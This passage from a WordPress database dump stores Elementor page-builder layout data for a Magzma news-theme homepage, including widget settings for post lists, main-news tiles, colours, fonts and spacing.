xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1275,454,'_elementor_version','0.4'),(1276,454,'_elementor_css','a:3:{s:4:\"time\";i:1508893778;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1278,455,'_elementor_edit_mode','builder'),(1279,455,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"zys1p12\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"mezoni7\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_s